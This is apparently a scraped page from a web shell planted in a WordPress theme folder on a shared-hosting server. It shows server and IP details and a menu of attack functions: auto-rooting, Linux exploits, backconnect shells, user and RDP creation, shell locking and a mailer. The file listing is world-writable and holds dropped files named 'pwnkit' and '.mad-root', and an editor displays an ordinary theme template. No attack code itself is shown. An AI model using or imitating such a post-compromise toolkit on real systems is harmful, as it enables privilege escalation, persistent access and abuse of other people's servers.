Linux webm006.cluster127.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.127.20.6 | : 216.73.217.174
Cant Read [ /etc/named.conf ]
7.4.33
kvtechr
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
kvtechr /
www /
wp-content /
themes /
qwery /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxrwxrwx
front-page
[ DIR ]
drwxrwxrwx
images
[ DIR ]
drwxrwxrwx
includes
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
plugins
[ DIR ]
drwxrwxrwx
skins
[ DIR ]
drwxrwxrwx
theme-options
[ DIR ]
drwxrwxrwx
theme-specific
[ DIR ]
drwxrwxrwx
.htaccess
237
B
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
404.php
233
B
-rwxrwxrwx
blog.php
1.63
KB
-rwxrwxrwx
changelog.txt
3.33
KB
-rwxrwxrwx
comments.php
10.66
KB
-rwxrwxrwx
footer.php
2.8
KB
-rwxrwxrwx
front-page.php
1.14
KB
-rwxrwxrwx
functions-num-compiler.php
181.15
KB
-rwxrwxrwx
functions-num.php
181.15
KB
-rwxrwxrwx
functions.php
60.73
KB
-rwxrwxrwx
functions.php_bak
41.8
KB
-rwxrwxrwx
functions.txt
41.8
KB
-rwxrwxrwx
header.php
6.57
KB
-rwxrwxrwx
image.php
1.3
KB
-rwxrwxrwx
index.php
2.71
KB
-rwxrwxrwx
page.php
472
B
-rwxrwxrwx
pwnkit
0
B
-rwxr-xr-x
readme.txt
3.16
KB
-rwxrwxrwx
rtl.css
181.1
KB
-rwxrwxrwx
screenshot.jpg
88.33
KB
-rwxrwxrwx
sidebar-pic.php
0
B
-rwxrwxrwx
sidebar.php
2.85
KB
-rwxrwxrwx
single.php
5.36
KB
-rwxrwxrwx
style.css
4.69
KB
-rwxrwxrwx
style.css.map
1.76
KB
-rwxrwxrwx
style.scss
4.23
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : single.php
<?php /** * The template to display single post * * @package QWERY * @since QWERY 1.0 */ // Full post loading $full_post_loading = qwery_get_value_gp( 'action' ) == 'full_post_loading'; // Prev post loading $prev_post_loading = qwery_get_value_gp( 'action' ) == 'prev_post_loading'; $prev_post_loading_type = qwery_get_theme_option( 'posts_navigation_scroll_which_block' ); // Position of the related posts $qwery_related_position = qwery_get_theme_option( 'related_position' ); // Type of the prev/next post navigation $qwery_posts_navigation = qwery_get_theme_option( 'posts_navigation' ); $qwery_prev_post = false; $qwery_prev_post_same_cat = qwery_get_theme_option( 'posts_navigation_scroll_same_cat' ); // Rewrite style of the single post if current post loading via AJAX and featured image and title is not in the content if ( ( $full_post_loading || ( $prev_post_loading && 'article' == $prev_post_loading_type ) ) && ! in_array( qwery_get_theme_option( 'single_style' ), array( 'style-6' ) ) ) { qwery_storage_set_array( 'options_meta', 'single_style', 'style-6' ); } do_action( 'qwery_action_prev_post_loading', $prev_post_loading, $prev_post_loading_type ); get_header(); while ( have_posts() ) { the_post(); // Type of the prev/next post navigation if ( 'scroll' == $qwery_posts_navigation ) { $qwery_prev_post = get_previous_post( $qwery_prev_post_same_cat ); // Get post from same category if ( ! $qwery_prev_post && $qwery_prev_post_same_cat ) { $qwery_prev_post = get_previous_post( false ); // Get post from any category } if ( ! $qwery_prev_post ) { $qwery_posts_navigation = 'links'; } } // Override some theme options to display featured image, title and post meta in the dynamic loaded posts if ( $full_post_loading || ( $prev_post_loading && $qwery_prev_post ) ) { qwery_sc_layouts_showed( 'featured', false ); qwery_sc_layouts_showed( 'title', false ); qwery_sc_layouts_showed( 'postmeta', false ); } // If related posts should be inside the content if ( strpos( $qwery_related_position, 'inside' ) === 0 ) { ob_start(); } // Display post's content get_template_part( apply_filters( 'qwery_filter_get_template_part', 'templates/content', 'single-' . qwery_get_theme_option( 'single_style' ) ), 'single-' . qwery_get_theme_option( 'single_style' ) ); // If related posts should be inside the content if ( strpos( $qwery_related_position, 'inside' ) === 0 ) { $qwery_content = ob_get_contents(); ob_end_clean(); ob_start(); do_action( 'qwery_action_related_posts' ); $qwery_related_content = ob_get_contents(); ob_end_clean(); if ( ! empty( $qwery_related_content ) ) { $qwery_related_position_inside = max( 0, min( 9, qwery_get_theme_option( 'related_position_inside' ) ) ); if ( 0 == $qwery_related_position_inside ) { $qwery_related_position_inside = mt_rand( 1, 9 ); } $qwery_p_number = 0; $qwery_related_inserted = false; $qwery_in_block = false; $qwery_content_start = strpos( $qwery_content, '<div class="post_content' ); $qwery_content_end = strrpos( $qwery_content, '</div>' ); for ( $i = max( 0, $qwery_content_start ); $i < min( strlen( $qwery_content ) - 3, $qwery_content_end ); $i++ ) { if ( $qwery_content[ $i ] != '<' ) { continue; } if ( $qwery_in_block ) { if ( strtolower( substr( $qwery_content, $i + 1, 12 ) ) == '/blockquote>' ) { $qwery_in_block = false; $i += 12; } continue; } else if ( strtolower( substr( $qwery_content, $i + 1, 10 ) ) == 'blockquote' && in_array( $qwery_content[ $i + 11 ], array( '>', ' ' ) ) ) { $qwery_in_block = true; $i += 11; continue; } else if ( 'p' == $qwery_content[ $i + 1 ] && in_array( $qwery_content[ $i + 2 ], array( '>', ' ' ) ) ) { $qwery_p_number++; if ( $qwery_related_position_inside == $qwery_p_number ) { $qwery_related_inserted = true; $qwery_content = ( $i > 0 ? substr( $qwery_content, 0, $i ) : '' ) . $qwery_related_content . substr( $qwery_content, $i ); } } } if ( ! $qwery_related_inserted ) { if ( $qwery_content_end > 0 ) { $qwery_content = substr( $qwery_content, 0, $qwery_content_end ) . $qwery_related_content . substr( $qwery_content, $qwery_content_end ); } else { $qwery_content .= $qwery_related_content; } } } qwery_show_layout( $qwery_content ); } // Comments do_action( 'qwery_action_before_comments' ); comments_template(); do_action( 'qwery_action_after_comments' ); // Related posts if ( 'below_content' == $qwery_related_position && ( 'scroll' != $qwery_posts_navigation || qwery_get_theme_option( 'posts_navigation_scroll_hide_related' ) == 0 ) && ( ! $full_post_loading || qwery_get_theme_option( 'open_full_post_hide_related' ) == 0 ) ) { do_action( 'qwery_action_related_posts' ); } // Post navigation: type 'scroll' if ( 'scroll' == $qwery_posts_navigation && ! $full_post_loading ) { ?> <div class="nav-links-single-scroll" data-post-id="<?php echo esc_attr( get_the_ID( $qwery_prev_post ) ); ?>" data-post-link="<?php echo esc_attr( get_permalink( $qwery_prev_post ) ); ?>" data-post-title="<?php the_title_attribute( array( 'post' => $qwery_prev_post ) ); ?>" <?php do_action( 'qwery_action_nav_links_single_scroll_data', $qwery_prev_post ); ?> ></div> <?php } } get_footer();
Close